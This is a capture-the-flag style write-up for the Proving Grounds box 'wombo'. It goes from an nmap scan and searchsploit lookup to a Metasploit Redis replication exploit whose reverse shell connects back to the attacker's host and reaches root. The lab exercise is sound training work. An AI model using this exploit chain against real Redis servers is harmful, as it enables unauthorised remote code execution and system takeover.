wombo
Exploitation Guide for wombo | Proving Grounds
Last updated
Was this helpful?
Exploitation Guide for wombo | Proving Grounds
Last updated
Was this helpful?
We will exploit Redis to get RCE.
# nmap -sSVC -T4 -v -p- -oN nmapFull.txt 192.168.212.69
Nmap scan report for 192.168.212.69
Host is up (0.24s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)
| 256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)
|_ 256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)
53/tcp closed domain
80/tcp open http nginx 1.10.3
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
6379/tcp open redis Redis key-value store 5.0.9
8080/tcp open http-proxy
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 3 disallowed entries
|_/admin/ /reset/ /compose
|_http-title: Home | NodeBB
27017/tcp open mongodb MongoDB 4.0.18Here we find out that Redis service ( v5.0.9) is running on the system.
Quick search using searchsploit. There is a Unauthenticated code execution module for metasploit.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/wombo/scans]
└─$ searchsploit redis 5
--------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------- ---------------------------------
Microsoft Windows 10 - Diagnostics Hub Standard Co | windows/local/45244.txt
Redis 4.x / 5.x - Unauthenticated Code Execution ( | linux/remote/47195.rb
Redis 5.0 - Denial of Service | linux/dos/44908.txt
Redis-cli < 5.0 - Buffer Overflow (PoC) | linux/local/44904.py
--------------------------------------------------- ---------------------------------
Shellcodes: No ResultsUse the module linux/redis/redis_replication_cmd_exec and set options as follows.
Be sure to use the port that is open in target system as
lportso it doesn't get blocked by firewall.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/wombo/exploits]
└─$ msfconsole
...
msf5 > use linux/redis/redis_replication_cmd_exec
msf5 exploit(linux/redis/redis_replication_cmd_exec) > show options
Module options (exploit/linux/redis/redis_replication_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CUSTOM true yes Whether compile payload file during exploiting
PASSWORD foobared no Redis password for authentication test
RHOSTS 192.168.212.69 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 6379 yes The target port (TCP)
SRVHOST 192.168.83.129 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 6379 yes The local port to listen on.
Payload options (linux/x64/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.83.129 yes The listen address (an interface may be specified)
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(linux/redis/redis_replication_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.83.129:8080
[*] 192.168.212.69:6379 - Compile redis module extension file
[+] 192.168.212.69:6379 - Payload generated successfully!
[*] 192.168.212.69:6379 - Listening on 192.168.83.129:6379
[*] 192.168.212.69:6379 - Rogue server close...
[*] 192.168.212.69:6379 - Sending command to trigger payload.
[*] Command shell session 2 opened (192.168.83.129:8080 -> 192.168.212.69:59796) at 2020-04-24 15:19:25 +0800
[!] 192.168.212.69:6379 - This exploit may require manual cleanup of './fkyrakg.so' on the target
whoami
root
cat proof.txt
<Redacted>